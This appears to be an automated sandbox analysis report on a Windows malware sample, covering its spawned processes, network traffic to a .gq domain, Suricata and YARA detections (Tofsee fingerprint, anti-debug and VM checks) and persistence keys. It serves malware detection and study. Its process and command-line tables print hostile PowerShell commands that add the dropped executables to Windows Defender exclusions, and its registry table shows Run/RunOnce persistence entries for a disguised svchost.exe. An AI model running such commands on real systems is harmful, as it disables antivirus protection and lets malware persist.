Category | Machine | Started | Completed |
---|---|---|---|
FILE | s1_win7_x6402 | July 1, 2021, 8:05 a.m. | July 1, 2021, 8:12 a.m. |
Process | PID | Command line |
---|---|---|
powershell.exe | 6012 | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\test22\AppData\Local\Temp\ujunkwerex.exe" -Force |
powershell.exe | 3752 | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\tj85xg1cs.exe" -Force |
powershell.exe | 6200 | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\tj85xg1cs.exe" -Force |
powershell.exe | 4672 | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\test22\AppData\Local\Temp\ujunkwerex.exe" -Force |
tj85xg1cs.exe | 2268 | "C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\tj85xg1cs.exe" |
tj85xg1cs.exe | 5572 | "C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\tj85xg1cs.exe" |
powershell.exe | 3352 | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\tj85xg1cs.exe" -Force |
powershell.exe | 4828 | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Resources\Themes\cbMadd8augIa6FPb2b0WT9H3Ncddgaq6QZ2084\svchost.exe" -Force |
powershell.exe | 296 | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\tj85xg1cs.exe" -Force |
powershell.exe | 7196 | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Resources\Themes\cbMadd8augIa6FPb2b0WT9H3Ncddgaq6QZ2084\svchost.exe" -Force |
timeout.exe | 1308 | timeout 1 |
tj85xg1cs.exe | 532 | "C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\tj85xg1cs.exe" |
powershell.exe | 8572 | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Resources\Themes\cbMadd8augIa6FPb2b0WT9H3Ncddgaq6QZ2084\svchost.exe" -Force |
powershell.exe | 6596 | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\test22\AppData\Local\Temp\ujunkwerex.exe" -Force |
powershell.exe | 5992 | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Resources\Themes\cbMadd8augIa6FPb2b0WT9H3Ncddgaq6QZ2084\svchost.exe" -Force |
timeout.exe | 5988 | timeout 1 |
ujunkwerex.exe | 2488 | "C:\Users\test22\AppData\Local\Temp\ujunkwerex.exe" |
Name | Response | Post-Analysis Lookup |
---|---|---|
kakosidobrosam.gq | 104.21.67.197 | |
Suricata Alerts
Flow | SID | Signature | Category |
---|---|---|---|
UDP 192.168.56.102:57660 -> 164.124.101.2:53 | 2025104 | ET INFO DNS Query for Suspicious .gq Domain | Potentially Bad Traffic |
TCP 192.168.56.102:49806 -> 172.67.180.37:443 | 2025108 | ET INFO Suspicious Domain (*.gq) in TLS SNI | Potentially Bad Traffic |
TCP 192.168.56.102:49806 -> 172.67.180.37:443 | 906200056 | SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) | undefined |
Suricata TLS
Flow | Issuer | Subject | Fingerprint |
---|---|---|---|
TLSv1 192.168.56.102:49806 172.67.180.37:443 | C=US, O=Cloudflare, Inc., CN=Cloudflare Inc ECC CA-3 | C=US, ST=California, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com | a2:99:7f:61:26:e9:24:3e:96:d0:98:83:eb:e0:35:eb:07:a8:19:f8 |
Type | Value |
---|---|
registry | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid |
request | GET https://kakosidobrosam.gq/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-FE44F55B90FB18A2A4452FA478F7245A.html |
request | GET https://kakosidobrosam.gq/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-1235E527CC34D56F5639DB569338CB90.html |
file | C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk |
cmdline | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\tj85xg1cs.exe" -Force |
cmdline | cmd.exe /c timeout 1 |
cmdline | "C:\Windows\System32\cmd.exe" /c timeout 1 |
cmdline | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Resources\Themes\cbMadd8augIa6FPb2b0WT9H3Ncddgaq6QZ2084\svchost.exe" -Force |
cmdline | powershell Add-MpPreference -ExclusionPath "C:\Users\test22\AppData\Local\Temp\ujunkwerex.exe" -Force |
cmdline | powershell Add-MpPreference -ExclusionPath "C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\tj85xg1cs.exe" -Force |
cmdline | powershell Add-MpPreference -ExclusionPath "C:\Windows\Resources\Themes\cbMadd8augIa6FPb2b0WT9H3Ncddgaq6QZ2084\svchost.exe" -Force |
cmdline | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\test22\AppData\Local\Temp\ujunkwerex.exe" -Force |
Rule | Description |
---|---|
Network_DNS | Communications use DNS |
DebuggerCheck__GlobalFlags | (no description) |
DebuggerCheck__QueryInfo | (no description) |
DebuggerHiding__Thread | (no description) |
DebuggerHiding__Active | (no description) |
ThreadControl__Context | (no description) |
SEH__vectored | (no description) |
anti_dbg | Checks if being debugged |
disable_dep | Bypass DEP |
Check_Qemu_Description | (no description) |
Check_Qemu_DeviceMap | (no description) |
Check_VBox_Description | (no description) |
Check_VBox_DeviceMap | (no description) |
Check_VBox_Guest_Additions | (no description) |
Check_VBox_VideoDrivers | (no description) |
Check_VMWare_DeviceMap | (no description) |
Check_VmTools | (no description) |
WMI_VM_Detect | Detection of Virtual Appliances through the use of WMI for use of evasion. |
vmdetect_misc | Following Rule is referenced from AlienVault's Yara rule repository. This rule contains additional processes and driver names. |
Type | Value |
---|---|
host | 172.217.25.14 |
host | 79.134.225.87 |
description | ujunkwerex.exe tried to sleep 5920114346 seconds, actually delayed analysis time by 5920114346 seconds |
Registry key | Value |
---|---|
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce\tj85xg1cs | C:\Windows\Resources\Themes\cbMadd8augIa6FPb2b0WT9H3Ncddgaq6QZ2084\svchost.exe |
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\SMTP Host | C:\Program Files (x86)\SMTP Host\smtphost.exe |